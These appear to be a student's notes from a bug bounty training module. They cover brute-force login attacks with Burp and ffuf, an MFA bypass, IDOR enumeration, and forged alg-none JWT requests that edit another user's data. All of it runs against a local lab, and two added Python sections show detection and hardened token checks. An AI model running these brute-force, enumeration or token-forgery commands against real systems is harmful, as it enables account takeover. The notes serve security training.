Practical Bug Bounty — TCM Academy | Module 6


Mohammad Awab Hassan Nizami

1- Introduction to Authentication

Authentication is a critical asset in applications, and an interesting area to hunt and research. Authentication means proving your identity: you go to the airport, show your passport, and then they let you through; that is authentication. Authorization means what you are allowed to do. We will start attacking with brute force and login issues.

2- Brute-force Attacks

We start with brute-force attacks.

Steps:

1. Instead of manually trying different passwords, automate the process with Burp Suite.
2. Intercept the login request and send it to Intruder.
3. Highlight the password and click the ADD button on the right side.
4. Add a password list in the payload options (use SecLists: passwords | path /usr/share/wordlists/seclists/password/xato-net-10-million-passwords-10000.txt).
5. Alternatively, use an open-source tool for brute forcing, but first copy the intercepted login request to a file.
6. Replace the password in the file with the word FUZZ and run the command below:

ffuf -request FILE_NAME.txt -request-proto http -w /usr/share/wordlists/seclists/password/xato-net-10-million-passwords-10000.txt

7. Filter out the failed-login responses by their size (1814 bytes here) so only the response that differs remains:

ffuf -request FILE_NAME.txt -request-proto http -w /usr/share/wordlists/seclists/password/xato-net-10-million-passwords-10000.txt -fs 1814

3- Attacking MFA

In MFA, keep an eye on the code. Let's say the code seems weak; even if it is not weak, ask yourself: is this code re-usable? Does it expire?

Steps:

1. Intercept the request.
2. While sending the request, simply replace the previous username with another user's and you might get logged in as that user.

4- Authentication Challenge Walkthrough

In this challenge, we have to brute-force the login and get logged in. The interesting thing here is that after 5 wrong login attempts, our account will be locked.

Steps:

1. Intercept the request and send it to Intruder.
2. Highlight the values after username and password, i.e. username=HIGHLIGHT and password=HIGHLIGHT.
3. Add both and choose the cluster bomb attack type.
4. You will get logged in.
5. Copy the intercepted request to a file to use with ffuf (-mr keeps only the responses whose body matches "Successfully"):

ffuf -request file.txt -request-proto http -mode clusterbomb -w /WORDLIST:FUZZUSER -w /WORDLIST:FUZZPASS

ffuf -request req.txt -request-proto http -mode clusterbomb -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt:FUZZUSER -w passwords.txt:FUZZPASS -mr "Successfully"
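As an added example (not part of the course or of this write-up), the defender-side view of sections 2 and 4: a per-account lockout stops many passwords against one user, but the cluster bomb spreads attempts across many usernames, so detection has to count distinct failed usernames per source as well as failures per account. The log format, addresses and names below are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed auth log (format and all names/addresses assumed, not from the lab):
# the lab's lockout fires after 5 failures on one account, so 10.0.0.9 trips it,
# while 10.0.0.5 stays under it per account by spreading failures across users.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z ip=10.0.0.5 user=admin result=FAIL
2024-05-01T10:00:02Z ip=10.0.0.5 user=root result=FAIL
2024-05-01T10:00:03Z ip=10.0.0.5 user=test result=FAIL
2024-05-01T10:00:04Z ip=10.0.0.5 user=guest result=FAIL
2024-05-01T10:00:05Z ip=10.0.0.5 user=jeremy result=FAIL
2024-05-01T10:00:06Z ip=10.0.0.5 user=jessamy result=OK
2024-05-01T10:00:07Z ip=10.0.0.9 user=jeremy result=FAIL
2024-05-01T10:00:08Z ip=10.0.0.9 user=jeremy result=FAIL
2024-05-01T10:00:09Z ip=10.0.0.9 user=jeremy result=FAIL
2024-05-01T10:00:10Z ip=10.0.0.9 user=jeremy result=FAIL
2024-05-01T10:00:11Z ip=10.0.0.9 user=jeremy result=FAIL
2024-05-01T10:00:12Z ip=10.0.0.9 user=jeremy result=FAIL
2024-05-01T10:00:13Z ip=10.0.0.7 user=jeremy result=FAIL
2024-05-01T10:00:14Z ip=10.0.0.7 user=jeremy result=OK
"""

LINE_RE = re.compile(r"^(\S+) ip=(\S+) user=(\S+) result=(OK|FAIL)$")

def parse(log_text):
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # skip lines that do not match the expected format
            events.append({"ts": m[1], "ip": m[2], "user": m[3], "ok": m[4] == "OK"})
    return events

def analyze(events, lockout_threshold=5, spray_threshold=4):
    fails_per_user = defaultdict(int)        # classic brute force: one account, many passwords
    failed_users_per_ip = defaultdict(set)   # spray: one source, many accounts
    for e in events:
        if not e["ok"]:
            fails_per_user[e["user"]] += 1
            failed_users_per_ip[e["ip"]].add(e["user"])
    return {
        "locked_accounts": sorted(u for u, n in fails_per_user.items() if n >= lockout_threshold),
        "spraying_ips": sorted(ip for ip, us in failed_users_per_ip.items() if len(us) >= spray_threshold),
    }

def report(log_text=SAMPLE_LOG):
    return analyze(parse(log_text))
```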

5- Introduction to Authorization

A vertical access control prevents a customer from accessing administrative controls on an e-commerce website, such as editing a product. A horizontal access control prevents users from modifying other users' details and data. A context-dependent access control allows access based on the application's current state.

6- IDOR

Whenever we see something like /labs/e0x02.php?account=1000 in a URL, the first thing we should try is to manipulate the parameter, both manually and with automated tools like Burp or ffuf.

Steps (burp):

Highlight the ID → send to Intruder → add a list of candidate IDs as the payload → start the attack and analyse the results.

Steps (ffuf):

ffuf -u 'http://localhost/labs/e0x02.php?account=FUZZ' -w list.txt -mr 'admin'

As you can see, we got three hits for accounts between 1008 and 1014; verify these, and in our case we got the admin details.

7- API

Typically we send a request to an API and get data back in return. So instead of the website returning an HTML page, it just sends back the requested data. Applications will be communicating with APIs in the background, so make sure to analyze your Burp Suite history.

Steps:

Send a request to a public API directly, then through the Burp proxy (-k skips certificate verification for the proxy's certificate):

curl https://catfact.ninja/breeds
curl --proxy http://localhost:8080 https://catfact.ninja/breeds -k

Try another HTTP method to see whether the endpoint accepts it:

curl -X PUT --proxy http://localhost:8080 https://catfact.ninja/breeds -k -d '{"name":"cheese cat"}'

Log in to the lab API:

curl -X POST -H "Content-Type: application/json" -d '{"username": "jeremy", "password": "cheesecake"}' http://localhost/labs/api/login.php

Decode the JWT token (the first part is the header, the second is the payload, the third is the signature):

echo 'eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0=' | base64 -d

Get the account details with a GET request:

curl -X GET "http://localhost/labs/api/account.php?token=JWT_TOKEN"

Try to modify data with a PUT request:

curl -X PUT -H "Content-Type: application/json" -d '{"token":"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0=","username": "jeremy", "role": "admin","bio":"Was a Java dev, Now admin"}' http://localhost/labs/api/account.php

Verify the modified change:

curl -X GET "http://localhost/labs/api/account.php?token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0="

Cmd:

Account 1:
curl -X GET "http://localhost/labs/api/account.php?token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0="
{"username":"jeremy","role":"staff","bio":"Was a Java dev, Now admin"}

Account 2:
curl -X GET "http://localhost/labs/api/account.php?token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVzc2FteSIsInJvbGUiOiJhZG1pbiJ9."
{"username":"jessamy","role":"admin","bio":"Security engineer."}

Changed jessamy's bio using jeremy's token/credentials:
curl -X PUT -H "Content-Type: application/json" -d '{"token":"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0=","username": "jeremy", "role": "admin","bio":"jessamy hacked lol!"}' http://localhost/labs/api/account.php
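Added example, not from the course or the lab's own code: the tokens above carry alg "none" with an empty signature, and the account endpoint trusts the username and role sent in the body. This Python shows a verifier that only accepts an HMAC-signed token, and an authorization check that takes the acting identity from the verified token; the same object-level check applies to the ?account=ID IDOR in section 6. The HMAC secret and the HS256 issuing helper are assumptions for the demo.

```python
import base64
import hashlib
import hmac
import json

# Token quoted from the lab write-up above: alg "none" and no signature.
JEREMY_TOKEN = ("eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=."
                "eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0=")
SECRET = b"constructed-demo-secret"  # assumed server-side HMAC key, not from the lab

def b64url_decode(seg):
    seg = seg.rstrip("=")  # tolerate the padded form used in the lab tokens
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def split_token(token):
    parts = token.split(".")
    if len(parts) == 2:  # the lab token omits the (empty) signature part
        parts.append("")
    if len(parts) != 3:
        raise ValueError("malformed token")
    return parts

def verify_hs256(token, key):
    # Hardened check: only HS256 is accepted (so "alg":"none" is refused) and the
    # MAC is compared in constant time. Returns the claims or None.
    head, body, sig = split_token(token)
    if json.loads(b64url_decode(head)).get("alg") != "HS256":
        return None
    mac = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_encode(mac), sig):
        return None
    return json.loads(b64url_decode(body))

def issue_hs256(claims, key):
    head = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    mac = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(mac)}"

def authorize_account_update(token, key, target_user):
    # The acting identity comes from the verified token, never from the body's
    # "username"/"role" fields, which is what let jeremy edit jessamy's bio.
    claims = verify_hs256(token, key)
    if claims is None:
        return "401 invalid token"
    if claims.get("user") != target_user and claims.get("role") != "admin":
        return "403 not your account"
    return "200 ok"
```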

8- Testing with Autorize

Cmd:

curl -X PUT --proxy localhost:8080 -H "Content-Type: application/json" -b "session=JWT_TOKEN" -d '{"username":"jeremy","bio":"new bio"}' http://localhost/labs/api/v2/account2.php